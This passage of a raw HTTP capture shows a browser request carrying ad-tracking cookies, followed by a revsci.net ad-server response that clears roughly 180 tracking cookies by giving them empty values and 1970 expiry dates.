Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2ZL1poyhgAWP5Eo4es3kaxW1feYH1YNm+vskrklkV+oIYNjONkByQANVsWNKqFQO5wXMuBl7LrFt9VvH8daQXgvCcc/xZFhpDSH3U4HVbBCIoq/8l/NhnpvaGiiSSrZ8kLGKEIhEwyeTfwOOT0SH98jWN4RywPgioVk8tTltp1p0UlKh8pgAGbJtLLHkzZlncToQPlWxsAy98jyGBAAGwnO3E3u1CL1AuqIBOad2NbOMmZnVBuDsFEtCusRTpf/eP/rfkboM67xVj/XJhGJYPg+W1/zwFI+aFZufGfL+/Z2SQplGqOPI3tNqk8XcE/ujqbTMA1byRkoOorO0+utOKrV87/bLRlYgLprcZr9jfXUBea5L0E99DIw7QmAt9edXA+GWvypoqWxSb7VjYfhviS1vMgyxtybpLpHkmK1YEkJDfxQLh8YRaLfzKLz9BGeRcG/pbGfe3l2iiQU9uA+5pAvvp0MUzDDsQe9Sxw2VU8g6kwqJaqi1jlhlid2LSxhnMJEYMo1sSEx1lsTmfmwdqW4L5W4G6MvPfoCl8AxFxP3k/qZn7W1GCq/vqvjZaJnVKmB9Hclql4FSg2qEI3GVbWPBpVcLHgkPV4kOsfhpa2otVl8jHM7XiwUaaHqTtyjHssQJ17jWcQW5bImC3mymJMwAsGhRzzFoHqEDMZQHWG0FCAaf0r/KQ29FcsMtODjzAtYrezVobTBqbH0qnPV8opyGyzm/uyJoXbzFgdk/tQ6w/7qGwbFrT2Z9Y73puC4yVjAfoDfL6udmM8uk3wTJPMW7M2qrSoxIM+ISFCWM2S3FH+8zXSctZMYCpANgDpbjA3qEy0TwLAonkipN1YQag6ZCxVL+vqRh6ruSTB1r70g=="; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sZLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qEBt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GPFg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HG8X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AMrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L9DA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1djr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R2Sk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tqia=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W0Nw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wjT0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OVF5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xj6q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tn_F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xy4W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7q1i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3mus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9AUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nDzG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_41iQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_70NL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lLND=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WJEP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ew4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Av4C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_KbQB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VU1j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tsTn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RqxL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_CYmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3BOa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dhOx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gXRf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w1GX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_91sR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Xxa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xUzf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RS6A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rX_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ynys=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xND8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U2-d=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S-vO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HG7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_id7F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2D0P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M1Z_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2RcV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fldA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_i0tL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4m8k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ppkq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_G93Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JCjG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yHyN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_C5Uh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8olB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kFhz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JeGp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Re8S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pDeg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wxyS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VyjV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JsaM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1p6o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VIa5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zc6p=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
